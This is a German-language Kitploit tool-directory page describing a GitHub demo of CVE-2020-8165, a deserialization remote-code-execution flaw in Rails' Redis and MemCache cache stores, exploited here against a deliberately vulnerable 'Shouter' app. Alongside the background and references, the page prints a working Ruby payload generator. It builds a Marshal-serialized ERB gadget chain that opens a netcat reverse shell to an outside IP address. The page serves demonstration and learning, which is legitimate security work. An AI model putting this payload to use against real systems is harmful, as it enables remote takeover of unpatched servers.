Skip to content
KitploitKITPLOIT
ToolsBlog
Log in
Einreichen
ToolsBlog
Einreichen

Hacking-, PenTest- und Cybersicherheits-Tools für Ihr Sicherheitsarsenal!

Kitploit ist ein Verzeichnis von Hacking-, Cybersicherheits- und Pentesting-Tools. Entdecken Sie die neuesten Projekt-Updates, um Schwachstellen zu finden, Systeme zu analysieren, Tests zu automatisieren und Ihre Sicherheit zu stärken.

··Feeds·Kontakt·Datenschutz·© 2026 Kitploit

Tool-Verzeichnis

Kategorien

Alle Kategorien anzeigen
Loading categories
cve-2020-8165-demo — Demonstration des CVE-2020-8165 Rails-Deserialisierungs-RCE-Exploits mit der realistischen Shouter-App, Payload-Generierung in Ruby und Redis-Cache-Poisoning. | Kitploit
Tools/GitHubGitHub/danielklim/cve-2020-8165-demo
SchwachstellenanalyseExploitationWebanwendungs-ExploitationPenetrationstestsLernen & BildungPayload-Entwicklung
GitHubdanielklim/cve-2020-8165-demo

cve-2020-8165-demo

Demonstration des CVE-2020-8165 Rails-Deserialisierungs-RCE-Exploits mit der realistischen Shouter-App, Payload-Generierung in Ruby und Redis-Cache-Poisoning.

Repository anzeigen
11vor 5 JahrenNoch nicht geprüft

Beliebteste

Alle anzeigen →

Entdecken Sie die meistgenutzten Tools unserer Community.

Alle Tools erkunden

Durchsuchen Sie unsere Tool-Sammlung

Alle Tools anzeigen →
Teilen

CVE-2020-8165 Demo

Yet another demo of CVE-2020-8165, though in a more realistic implementation than most.

Hintergrund

CVE-2020-8165

Eine Schwachstelle durch Deserialisierung nicht vertrauenswürdiger Daten besteht in rails < 5.2.4.3, rails < 6.0.3.1, die es einem Angreifer ermöglichen kann, benutzergestellte Objekte in MemCacheStore und RedisCacheStore zu unmarshalen, was möglicherweise zu einer RCE führt.

Referenzen

  • https://hackerone.com/reports/413388
  • https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2020-8165
  • https://nvd.nist.gov/vuln/detail/CVE-2020-8165
  • https://www.cvebase.com/cve/2020/8165
  • https://lab.wallarm.com/exploring-de-serialization-issues-in-ruby-projects-801e0a3e5a0a/

Implementierung

Die "Shouter"-App verfügt über eine Caching-Funktion in ihrem Shout-Modell, bei der optionale Bilder, die mit einem shout:string übermittelt werden, in redis zwischengespeichert und von dort anstatt aus der DB abgerufen werden. Da die anfällige Methode Rails.cache.fetch zur Interaktion mit dem Cache verwendet wird, ist diese App anfällig für CVE-2020-8165, und die Ergebnisse der RCE werden in das src-Attribut der img-Tags in der Dashboard-Route eingefügt.

Generieren von RCE-Payloads

Der folgende Code-Ausschnitt generiert das Payload, das Sie mit exploit.py senden müssen. Es gibt einige Nuancen beim Serialisierungsschritt, die geklärt werden müssen, um den Exploit vollständig in Python zu implementieren. Daher wird Marshal.dump in Ruby benötigt, um das genaue Payload zu generieren (vorerst).

cmd = "Thread.new{system('nc 172.17.188.169 3001 -e /bin/bash')}"
erb = ERB.allocate
erb.instance_variable_set(:@src, cmd)
erb.instance_variable_set(:@lineno, 0)
payload_raw = ActiveSupport::Deprecation::DeprecatedInstanceVariableProxy.new(erb, :result)
payload = Marshal.dump(payload_raw)
p payload
Tool herunterladen